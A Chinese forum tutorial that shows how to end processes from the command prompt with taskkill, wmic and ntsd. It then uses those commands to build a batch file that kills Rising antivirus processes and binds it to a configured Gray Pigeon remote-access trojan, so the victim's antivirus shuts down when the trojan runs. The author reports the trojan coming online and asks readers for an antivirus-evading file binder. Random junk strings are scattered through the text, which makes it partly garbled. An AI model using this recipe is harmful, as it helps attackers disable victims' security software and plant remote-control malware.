软件简介: J& Q4 f* x$ d
大家好,我是桦香,今天我给大家做个教程:cmd下命令提示符下关进程+木马捆绑关杀毒软件批处理
) C @# O$ t) @! p, z& x* d本来打算做个语音的,由于麦克风出了问题,所以只好多打点字了,为了节约时间,大部分的字我已经打好了.
6 S* @+ z7 F. W7 P$ `5 @$ g/ ]cmd下命令提示符下杀进程主要有三种方法:
; ~; P; m$ ?3 U4 y( L( y% p1、用taskill命令
7 U6 h8 M; z. C& R# U) C) r9 d ①taskkill /im 进程名称
8 C7 ] \; M1 q' q7 P) e 示例:用taskkill /im VStart.exe命令关闭音速启动,VStart.exe就是音速启动的进程名称,下面看操作,执行了三次,成功关闭了音速启动,再看下面的方法.
# [4 s, c: ~, V
/ z f) \+ ~: I; F: Z % @+ ~' R$ K: k% e
②taskkill /pid[进程码] -t(结束该进程) -f(强制结束该进程以及所有子进程) ) y. X& g5 X/ q" x
注:有两种方法查进程的PID码:
; Y! c. g E: Y; u ①在命令行下用 tasklist 命令查出进程的PID号码,就是这些7 L& r" A; _- Z/ ^1 q; ~9 Z) V! w' i+ t
②在任务管理器中的查看选项中选择选择列中勾先PID那一项
$ M! C& B* g: a. ~( F
' S& E% {. W2 N 示例:举个关闭迅雷的例子,先找出迅雷的PID码2552
* L4 d |+ V4 y' S3 N! \ taskkill /pid 2552 -f,就是这个指令,下面来运行一下看看.看到没有迅雷已经关闭了,再看下面的方法
0 A8 E3 V% {( ~4 x+ [. K2、用 wmic process where name=进程名称 call terminate 这个不需要知道进程的PID号
- r2 N# D" G" W* a8 x! N 示例:, H9 u& k8 c8 y# K0 d
wmic process where name=iexplore.exe call terminate 关闭IE浏览器,我们来运行一下这条指令看看.看到了吧浏览器已经关闭了,再看下面的.
* P5 M5 y' X; q# k' {% M
! w0 D) o( V8 L+ f3、ntsd -c q -p [pid进程码]
# X% y, M S, | 示例:还是举个关闭迅雷的吧,同样先找出迅雷的PID码2724
9 q/ Z4 |: z4 y3 @ ntsd -c q -p 2724 是这条指令,下面我们来执行一下看看.看到了吧,迅雷已经关闭了.2 _7 c& p# V; ~, U0 G; x
这样关进程有什么作用呢?
: [* l- b1 a' Q7 E一方面遇到不能用任务管理器结束的进程可以试试上面的方法,而且用wmic process where name=进程名称 call terminate和taskkill /im 进程名称这两条可以同时关闭多个进程名相同的进程,举个关2个QQ的例子吧,
$ Y% {% F& ^, S. W4 S已经打开了两个QQ程序,wmic process where name=QQ.exe call terminate,我们来执行一下看看,看到了吧,两个QQ都关闭了.
; [6 f- X! n, y* N另一方面我们利用上面的命令可以做个关杀毒软件的批处理,然后把批处理文件和木马捆绑在一起,这样运行木马的时候就关闭了杀毒软件,下面看我操作7 Z) H$ U: ~; p4 e
1、先建立一个关闭杀毒软件进程的批处理文件,这里我以关闭瑞星为例,说明一下我的瑞星已经关闭了监控系统,所以这些就不用了:wmic process where name=RavTask.exe call terminate1 ?, h$ W5 Z. D9 t
wmic process where name=CCenter.exe call terminate
0 P* f( e" z9 Rwmic process where name=RavmonD.exe call terminate
2 ]) l8 x, h/ O9 U4 i E1 |wmic process where name=Ravmon.exe call terminate0 C0 ^! v0 T5 R; F
wmic process where name=RavStub.exe call terminate# D" u+ P8 l# x9 s! Y. f
2、配置一个木马,配个鸽子吧0 b9 H. J, l; h1 t( D2 U+ l1 L
3、用文件捆绑器将批处理文件和木马捆绑到一起,这里我随便找个文件捆绑器,不是免杀的,
8 K A/ H3 z# o% w7 ?& R. p' V已经捆绑好了
' I, J i" D" T, K1 a我们来运行一下捆绑后的文件
) E. X! e3 I; s2 P+ W- @看到没有,瑞星已经关闭了,鸽子也上线了.我没有免杀的文件捆绑器,大家有的话,希望可以送个给我.
& I9 r# `# N! p/ S: D* F8 a; r下载地址:
|
鲁公网安备 37132602371510号
流量统计
最新整理Linux手工服务端_末世策略塔防手游
